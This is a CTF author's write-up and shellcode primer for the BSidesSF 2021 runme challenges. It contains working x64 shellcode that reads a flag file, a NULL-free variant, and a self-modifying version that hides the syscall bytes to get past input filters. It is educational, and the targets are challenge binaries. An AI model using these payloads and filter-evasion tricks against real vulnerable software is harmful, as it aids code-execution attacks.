BSidesSF CTF 2021 Author writeup / shellcode primer: Runme, Runme2, and Runme3

Hi Everybody!

This is going to be a writeup for the Runme suite of challenges from BSides San Francisco 2021.

The three challenges I’ll cover are runme, runme2, and runme3, which are increasingly difficult write-shellcode challenges. As always, the binary and info the player gets is in the respective distfiles/ folder, and source is in challenge/.

I use the same basic code from runme for a TON of challenges, including the reverseme challenges, so definitely keep an eye out in anything else I write. :)

You can execute the binaries locally by simply running them and sending code to stdin. Or you can host it on the network using nc -e or xinetd for a more realistic setup. You can also use the Dockerfile included:

~/projects/ctf-2021-release/runme/challenge $ docker build . -t runme && docker run -p1337:1337 --rm -ti runme

My intent was to encourage players to experiment with writing shellcode, but to also make it solvable by MSFVenom. It turns out that at least with default settings, MSFVenom was unable to solve runme3. That made it a bit of a difficulty cliff, and I removed it from the 101 tag part-way through the game.

Runme

First, let’s talk a second about shellcode. Shellcode refers to a self-contained chunk of code that, traditionally, spawns a shell. By “self-contained”, I mean that it doesn’t use any libraries or imports: it talks straight to the kernel via system calls (aka syscalls).

To perform a syscall from assembly (on x64 Linux), a syscall number is stored in rax, and arguments are loaded into several other registers (rdi, rsi, rdx, and so on - see the table above). Then the syscall instruction is invoked, which passes control over to the kernel. Behind the scenes, that’s what all your favourite functions are ultimately doing, no matter which language you’re using.

The most common system call folks use is exec, which opens an interactive shell (hence, “shellcode”). But personally, I like to use open to get a handle to the flag file, read to read it into a buffer, and write to write it out to stdout (and therefore to the player). I find the open/read/write style to be more versatile and easier to remember.

Here is some simple, unoptimized shellcode. I tried to comment it as best I could:

bits 64

;;; OPEN

  mov rax, 2 ; Syscall 2 = sys_open
  call getfilename ; Pushes the next address onto the stack and jumps down
  db "/home/ctf/flag.txt",0 ; The literal flag, null terminated
getfilename:
  pop rdi ; Pop the top of the stack (which is the filename) into rdi
  mov rsi, 0 ; Flags = 0
  mov rdx, 0 ; Mode = 0
  syscall ; Perform sys_open() syscall, the file handle is returned in rax

;;; READ

  push rdi ; Temporarly store the filename pointer
  push rax ; Temporarily store the handle

  mov rax, 0 ; Syscall 0 = sys_read
  pop rdi ; Move the file handle into rdi
  pop rsi ; Use the same buffer where the filename pointer is stored (it's readable and writable)
  mov rdx, 30 ; rdx is the count
  syscall ; Perform sys_read() syscall, reading from the opened file

;;; WRITE

  mov rax, 1 ; Syscall 1 = sys_write
  mov rdi, 1 ; File handle to write to = stdout = 1
  ; (rsi is already the buffer)
  mov rdx, 30 ; rdx is the count again
  syscall ; Perform the sys_write syscall, writing the data to stdout

;;; EXIT
  mov rax, 60 ; Syscall 60 = exit
  mov rdi, 0 ; Exit with code 0
  syscall ; Perform an exit

Or if you don’t want to copy and paste, you can grab the file from the solution folder.

One of the weirdest things is that “call” business at the top. What’s happening is that the call instruction pushes the next address onto the stack then jumps to the specified address. Typically you’d then use ret to return to that address, but we don’t want to return to it. We want a pointer to it! So instead of consuming the address using ret, we pop it into a register to get a pointer to the flag path. This is a long-winded way to get the value of eip, the instruction pointer, which we can’t normally access - it’s a super common shellcoding trick, and we’ll see it again on runme3 to build self-modifying code!

To run it, make sure you have a flag.txt file handy, assemble with nasm, and give it a whirl:

$ mkdir -p /home/ctf/
$ echo 'CTF{fake_flag}' > /home/ctf/flag.txt
$ nasm -o solution.bin solution.asm
$ ./runme < solution.bin
Send me x64!!
CTF{fake_flag}

You can also use strace to see what’s going on (or debug if something isn’t working.. I did that a lot writing this blog):

$ strace ./runme < solution.bin
[...]
open("/home/ctf/flag.txt", O_RDONLY)    = 3
read(3, "CTF{fake_flag}\n", 30)         = 15
write(1, "CTF{fake_flag}\ntxt\0_\276\0\0\0\0\272\0\0\0\0", 30CTF{fake_flag}
txt_) = 30
exit(0)                                 = ?

The same four syscalls from our source! You can see that open() runs, and returns 3 (the file handle). Then read runs, using the file handle 3, and returns 15 (the length of the flag). Then write() is called, with the file descriptor set to “1”, which writes to stdout. And then we exit cleanly (that’s optional).

Runme2

Runme2 adds a very common restriction: no NULL bytes! It’s so common, in fact, that most shellcode you can find online is already free of NULL bytes! But if you look at the code we wrote for runme1, it looks like this:

$ ndisasm -b64 solution.bin 
00000000  B802000000        mov eax,0x2
00000005  E813000000        call 0x1d
0000000A  2F                db 0x2f
0000000B  686F6D652F        push qword 0x2f656d6f
00000010  63                db 0x63
00000011  7466              jz 0x79
00000013  2F                db 0x2f
00000014  666C              o16 insb
00000016  61                db 0x61
00000017  672E7478          cs jz 0x93
0000001B  7400              jz 0x1d
0000001D  5F                pop rdi
0000001E  BE00000000        mov esi,0x0
00000023  BA00000000        mov edx,0x0
00000028  0F05              syscall
0000002A  57                push rdi
0000002B  50                push rax
0000002C  B800000000        mov eax,0x0
00000031  5F                pop rdi
00000032  5E                pop rsi
00000033  BA1E000000        mov edx,0x1e
00000038  0F05              syscall
0000003A  B801000000        mov eax,0x1
0000003F  BF01000000        mov edi,0x1
00000044  BA1E000000        mov edx,0x1e
00000049  0F05              syscall
0000004B  B83C000000        mov eax,0x3c
00000050  BF00000000        mov edi,0x0
00000055  0F05              syscall

The middle column are the raw bytes, and there are indeed a lot of zeroes in there!

You’ll also notice some weirdness starting at line 0x0000000A - that’s the “/home/ctf/flag.txt” string being interpreted (incorrectly) as code. You can just ignore that.

The most complicated change we need to make is dealing with that “call” again:

00000005  E813000000        call 0x1d

It has a bunch of 00 bytes! This is due to a weird quirk (well, a perfectly normal quirk) in x64: calls and jumps are relative, which means the machine code instructions are based on the distance being jumped. And it kinda has to be, because we have no idea where in memory we’re loaded. Trying to use an absolute address would never work!

The problem here is, calls can only use 32-bit (4 byte) offsets! In the code above, the call jumps 0x13 bytes forward - “13 00 00 00” in little endian represents 0x00000013.

While calls are strict about using 4-byte offsets, jmp’s are more flexible. A jmp can be “short”, which only uses a single byte offset (which means a short jmp can only jump 127 bytes forward or 128 bytes backwards). By changing the call to a jmp, we get rid of those pesky 00’s:

00000005  EB13              jmp short 0x1d

….but, jmp doesn’t push the current address onto the stack, and as discussed above, that’s the whole point. Uh oh!

So we can jmp forward, but can’t call forward. How do we solve that?

Simple: by calling backwards!

When you call code that’s above your code, the offset is negative. x64, like most architectures, uses two’s complement to store negative numbers. That means that negatives lead with binary 1 bits instead of binary 0 bits. So a one-byte backwards call will look like 0xFFFFFFxx instead of 0x000000xx.

That call is by far the most complicated change! The rest of the changes are just fairly simple tricks that have been well known for a long time: changing “mov REG, 0” to “xor REG, REG”, for example. And, when possible, addressing 64-bit registers (like rax) using only the bottom byte (like al). All of this becomes second nature after awhile, but if you’re curious to learn more I learned this from Hacking: Art of Exploitation.

Here is the code I ended up with (or you can grab it from the solution folder):

bits 64

;;; OPEN

  ; Syscall 2 = sys_open
  xor rax, rax
  mov al, 2

  ; rdi = filename
  jmp short getfilename_bottom
getfilename_top:
  pop rdi ; Pop the top of the stack (which is the filename) into rdi

  ; rsi = flags
  xor rsi, rsi

  ; rdx = mode
  xor rdx, rdx

  ; Perform sys_open() syscall, the file handle is returned in rax
  syscall

;;; READ

  push rdi ; Temporarly store the filename pointer
  push rax ; Temporarily store the handle

  ; Syscall 0 = sys_read
  xor rax, rax

  ; rdi = file handle
  pop rdi

  ; rsi = buffer (same as filename)
  pop rsi

  ; rdx = count
  xor rdx, rdx
  mov dl, 30

  ; Perform sys_read() syscall, reading from the opened file
  syscall

;;; WRITE

  ; Syscall 1 = sys_write
  xor rax, rax
  inc rax

  ; File handle to write to = stdout = 1
  xor rdi, rdi
  inc rdi

  ; (rsi is already the buffer)

  ; rdx is the count again
  xor rdx, rdx
  mov dl, 30

  ; Perform the sys_write syscall, writing the data to stdout
  syscall

;;; EXIT
  ; Syscall 60 = exit
  xor rax, rax
  mov al, 60

  ; Exit with code 0
  xor rdi, rdi

  ; Perform an exit
  syscall

getfilename_bottom:
  call getfilename_top

  db "/home/ctf/flag.txt" ; The literal flag, fortunately the buffer itself is null-filled so we don't need to null terminate

Let’s build, then verify there are no NULL bytes:

$ nasm -o solution2.bin solution2./asm
$ ndisasm -b64 solution2.bin
00000000  4831C0            xor rax,rax
00000003  B002              mov al,0x2
00000005  EB34              jmp short 0x3b
00000007  5F                pop rdi
00000008  4831F6            xor rsi,rsi
0000000B  4831D2            xor rdx,rdx
0000000E  0F05              syscall
00000010  57                push rdi
00000011  50                push rax
00000012  4831C0            xor rax,rax
00000015  5F                pop rdi
00000016  5E                pop rsi
00000017  4831D2            xor rdx,rdx
0000001A  B21E              mov dl,0x1e
0000001C  0F05              syscall
0000001E  4831C0            xor rax,rax
00000021  48FFC0            inc rax
00000024  4831FF            xor rdi,rdi
00000027  48FFC7            inc rdi
0000002A  4831D2            xor rdx,rdx
0000002D  B21E              mov dl,0x1e
0000002F  0F05              syscall
00000031  4831C0            xor rax,rax
00000034  B03C              mov al,0x3c
00000036  4831FF            xor rdi,rdi
00000039  0F05              syscall
0000003B  E8C7FFFFFF        call 0x7
00000040  2F                db 0x2f
00000041  686F6D652F        push qword 0x2f656d6f
00000046  63                db 0x63
00000047  7466              jz 0xaf
00000049  2F                db 0x2f
0000004A  666C              o16 insb
0000004C  61                db 0x61
0000004D  672E7478          cs jz 0xc9
00000051  74                db 0x74

Notice how the call function is now padded with FF bytes? That’s what I was explaining above about a negative offset:

0000003B  E8C7FFFFFF        call 0x7

And, of course, validate that it still works:

$ nasm -o solution2.bin solution2.asm
$ ./runme2 < ./solution2.bin 
Send me x64!! No nulls, plz
CTF{fake_flag}

Runme3

This is where it actually gets really hard. In addition to disallowing NULL bytes, I also disallow the bytes required for syscall, which also apparently breaks MSFVenom’s encoder!

Typically, the syscall instruction is 0F 05:

00000039  0F05              syscall

But those exact bytes aren’t allowed! How do you get around THAT restriction?

There are many ways, and the most common way is to use an encoder. And encoder basically XORs each byte with a set value, which changes it to something else. At the start of the shellcode, you XOR by that value again, and voila! You have the original code back! That’s called an encoder, and is often used for hiding malicious payloads. But we can do something a bit easier (or harder, I dunno).

The way I solved that was to put the syscall bytes, minus one, at the bottom of the code, the same way I put the flag path there, followed by a return instruction. It’s a mini encoded function! Then I get a pointer to it using the same jmp/call/pop trick from earlier, and add 1 to each byte. That gives me a very small function I can call that simply performs a syscall.

This is technically “self modifying code”, or maybe even “polymorphic shellcode”, to use a fancy name. But it’s the simplest version of it I could think of.

Let’s take a look at the solution:

bits 64

; Jump down to the bottom, where we have the bytes for syscall (less 1) waiting
jmp short my_fake_syscall_bottom
  my_fake_syscall_top:
  pop rbx ; Pop the address of the syscall-minus-1 block into rbx
  add word [rbx], 0x0101 ; Increment the two bytes - 0x0e -> 0x0f and 0x04 -> 0x05

  ; Now rbx points to "syscall / ret", so we can just call that any time we
  ; need a syscall!
  ;
  ; Other than changing "syscall" to "call rbx", the rest is identical!

;;; OPEN

  ; Syscall 2 = sys_open
  xor rax, rax
  mov al, 2

  ; rdi = filename
  jmp short getfilename_bottom
getfilename_top:
  pop rdi ; Pop the top of the stack (which is the filename) into rdi

  ; rsi = flags
  xor rsi, rsi

  ; rdx = mode
  xor rdx, rdx

  ; Perform sys_open() syscall, the file handle is returned in rax
  call rbx

;;; READ

  push rdi ; Temporarly store the filename pointer
  push rax ; Temporarily store the handle

  ; Syscall 0 = sys_read
  xor rax, rax

  ; rdi = file handle
  pop rdi

  ; rsi = buffer (same as filename)
  pop rsi

  ; rdx = count
  xor rdx, rdx
  mov dl, 30

  ; Perform sys_read() syscall, reading from the opened file
  call rbx

;;; WRITE

  ; Syscall 1 = sys_write
  xor rax, rax
  inc rax

  ; File handle to write to = stdout = 1
  xor rdi, rdi
  inc rdi

  ; (rsi is already the buffer)

  ; rdx is the count again
  xor rdx, rdx
  mov dl, 30

  ; Perform the sys_write syscall, writing the data to stdout
  call rbx

;;; EXIT
  ; Syscall 60 = exit
  xor rax, rax
  mov al, 60

  ; Exit with code 0
  xor rdi, rdi

  ; Perform an exit
  call rbx

my_fake_syscall_bottom:
  call my_fake_syscall_top

  ; This little block will become "syscall / ret"
  db 0x0e, 0x04 ; syscall is actually 0x0f 0x05
  ret ; Return after doing a syscall


getfilename_bottom:
  call getfilename_top

  db "/home/ctf/flag.txt" ; The literal flag, fortunately the buffer itself is null-filled so we don't need to null terminate

And, of course, validate it works:

$ nasm -o solution3.bin solution3.asm
$ ./runme3 < solution3.bin
Send me x64!! No nulls, plz. Also no 0xcd, 0x80, 0x0f, or 0x05.
CTF{fake_flag}

Conclusion

Hopefully that makes sense! I know that self re-writing code is far tricker than the rest, but hopefully it’s not too crazy! I really didn’t mean the difficulty ramp to be that steep, but next year I’m definitely going to do a much, much gentler difficulty slope :)

Runme

Runme2

Runme3

Conclusion

Comments